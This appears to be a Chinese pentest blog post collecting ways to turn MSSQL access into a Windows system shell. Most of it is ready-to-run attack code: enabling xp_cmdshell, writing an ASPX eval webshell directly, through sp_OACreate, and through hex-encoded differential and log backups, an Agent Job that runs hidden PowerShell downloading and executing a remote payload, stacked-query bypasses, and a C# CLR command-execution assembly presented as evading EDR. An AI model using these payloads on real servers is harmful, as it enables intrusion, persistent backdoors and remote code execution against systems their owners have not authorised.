0%

mssql_getshell的一些总结

简介:

  • mssql获取shell的总结

    1
    一些针对MSSQL服务的攻击手法学习

环境介绍:

系统版本: 系统x64windows2k8r2

mssql数据库版本: mssql2k8

技能一:

xp_cmd_shell

开启xp_cmd_shell

1
2
3
4
5
6
7
EXEC sp_configure 'show advanced options',1
go
RECONFIGURE
go
EXEC sp_configure 'xp_cmdshell',1
RECONFIGURE
GO

不开启会报错

1.jpg

执行系统命令

1
exec xp_cmdshell 'whoami'

2.jpg

写webshell:

1
exec xp_cmdshell 'echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > C:\Windows\Temp\cmd.aspx'

3.jpg

技能二:

1
由于某60 会拦截xp_cmd_shell这个组件,导致cmd命令执行不了,或者这个组件被删除,所以用这个组件。

SP_OACreate

开启sp_oacreate:

1
2
3
4
5
EXEC sp_configure 'show advanced options', 1;  
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'show advanced options', 0;

写webshell:

1
2
3
4
declare @sp_passwordxieo int, @f int, @t int, @ret int;
exec sp_oacreate 'scripting.filesystemobject', @sp_passwordxieo out;
exec sp_oamethod @sp_passwordxieo, 'createtextfile', @f out, 'C:\Windows\Temp\test.aspx', 1;
exec @ret = sp_oamethod @f, 'writeline', NULL,'winter is coming';--

4.jpg

技能三

差异备份拿shell

1
2
3
4
5
#create database test;																				//创建数据库
#backup database test to disk = 'C:\Windows\Temp\bak.bak'; //创建数据库备份文件路径
#create table [dbo].[dtest] ([cmd][image]); //创建表
#insert into dtest(cmd) values(0x3c25402050616765204c616e67756167653d224a73637269707422255e3e5e3c256576616c28526571756573742e4974656d5b2270617373225d2c22756e7361666522293b255e3e); //字段写入webshell hex编码
#backup database test to disk='C:\Windows\Temp\bake.aspx' WITH DIFFERENTIAL,FORMAT; //导出webshell到目录

5.jpg

技能四

log备份拿shell

1
2
3
4
5
6
#create database test;																				//创建数据库
#alter database test set RECOVERY FULL //设置为恢复模式
#create table cmd (a image) //创建表
#backup log test to disk = 'C:\Windows\Temp\bakbak' with init //初始化备份目录
#insert into cmd (a) values (0x3c25402050616765204c616e67756167653d224a73637269707422255e3e5e3c256576616c28526571756573742e4974656d5b2270617373225d2c22756e7361666522293b255e3e) //插入键值webshellhex编码
#backup log test to disk = 'C:\Windows\Temp\testtest.aspx'

6.jpg

技能五

通过Agent Job 执行命令

前提,需要SQL Server 代理服务正常开启

1
exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT'

10.png

使用方法:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
USE msdb;
GO
EXEC dbo.sp_add_job
@job_name = N'test_powershell_job1' ;
GO
EXEC sp_add_jobstep
@job_name = N'test_powershell_job1',
@step_name = N'test_powershell_name1',
@subsystem = N'PowerShell',
@command = N'powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(''http://xxx.xxx.xxx.xxx:xxxxx/file''))"',

@retry_attempts = 1,
@retry_interval = 5;
GO
EXEC dbo.sp_add_jobserver
@job_name = N'test_powershell_job1';
GO
EXEC dbo.sp_start_job N'test_powershell_job1';
GO

上线

11.png

tip

绕过mssql不能堆叠,实现mssql命令执行

(1)使用openrowset函数

前提需要开启Ad Hoc Distributed Queries 组件

1
exec sp_configure 'show advanced options',1 reconfigure exec sp_configure 'Ad Hoc Distributed Queries',1 reconfigure

利用

1
2
3
4
5
6
7
8
9
10
11
12
13
OPENROWSET
( { 'provider_name'
, { 'datasource' ; 'user_id' ; 'password' | 'provider_string' }
, { <table_or_view> | 'query' }
| BULK 'data_file' ,
{ FORMATFILE = 'format_file_path' [ <bulk_options> ]
| SINGLE_BLOB | SINGLE_CLOB | SINGLE_NCLOB }
} )



最终语句:
select * from openrowset('sqloledb','dsn=locaserver;trusted_connection=yes','set fmtonly off exec master..xp_cmdshell ''whoami''')

7.png

(2)使用if函数使用exec

1
2
3
4
5
6
7
8
IF Boolean_expression  
{ sql_statement | statement_block }
[ ELSE
{ sql_statement | statement_block } ]


最终语句:
select 1 where 1=1 if 1=1 exec xp_cmdshell 'whoami'

8.png

(3)无文件落地执行系统命令

MSSQL使用CLR程序集来执行命令,对于这理解有点类似于mysql 恶意so文件加载实现命令执行。

特点:绕过edr等杀软

开启CLR语句

1
2
3
4
sp_configure 'clr enabled', 1
GO
RECONFIGURE
GO

将数据库标记为安全

1
ALTER DATABASE master SET TRUSTWORTHY ON;

demo代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using System.Diagnostics;
using System.Text;
using Microsoft.SqlServer.Server;

public partial class StoredProcedures
{
[Microsoft.SqlServer.Server.SqlProcedure]
public static void ExecCommand (string cmd)
{
// 在此处放置代码
SqlContext.Pipe.Send("Command is running, please wait.");
SqlContext.Pipe.Send(RunCommand("cmd.exe", " /c " + cmd));
}
public static string RunCommand(string filename,string arguments)
{
var process = new Process();

process.StartInfo.FileName = filename;
if (!string.IsNullOrEmpty(arguments))
{
process.StartInfo.Arguments = arguments;
}

process.StartInfo.CreateNoWindow = true;
process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
process.StartInfo.UseShellExecute = false;

process.StartInfo.RedirectStandardError = true;
process.StartInfo.RedirectStandardOutput = true;
var stdOutput = new StringBuilder();
process.OutputDataReceived += (sender, args) => stdOutput.AppendLine(args.Data);
string stdError = null;
try
{
process.Start();
process.BeginOutputReadLine();
stdError = process.StandardError.ReadToEnd();
process.WaitForExit();
}
catch (Exception e)
{
SqlContext.Pipe.Send(e.Message);
}

if (process.ExitCode == 0)
{
SqlContext.Pipe.Send(stdOutput.ToString());
}
else
{
var message = new StringBuilder();

if (!string.IsNullOrEmpty(stdError))
{
message.AppendLine(stdError);
}

if (stdOutput.Length != 0)
{
message.AppendLine("Std output:");
message.AppendLine(stdOutput.ToString());
}
SqlContext.Pipe.Send(filename + arguments + " finished with exit code = " + process.ExitCode + ": " + message);
}
return stdOutput.ToString();
}
}

创建存储过程:

1
2
3
4
CREATE PROCEDURE [dbo].[ExecCommand]
@cmd NVARCHAR (MAX)
AS EXTERNAL NAME [evilclr].[StoredProcedures].[ExecCommand]
go

执行命令:

1
exec dbo.execcommand 'whoami'

9.png

攻击框架:

1
https://github.com/mindspoof/MSSQL-Fileless-Rootkit-WarSQLKit

(4)站裤分离,目标不出网的攻击手法

参考链接: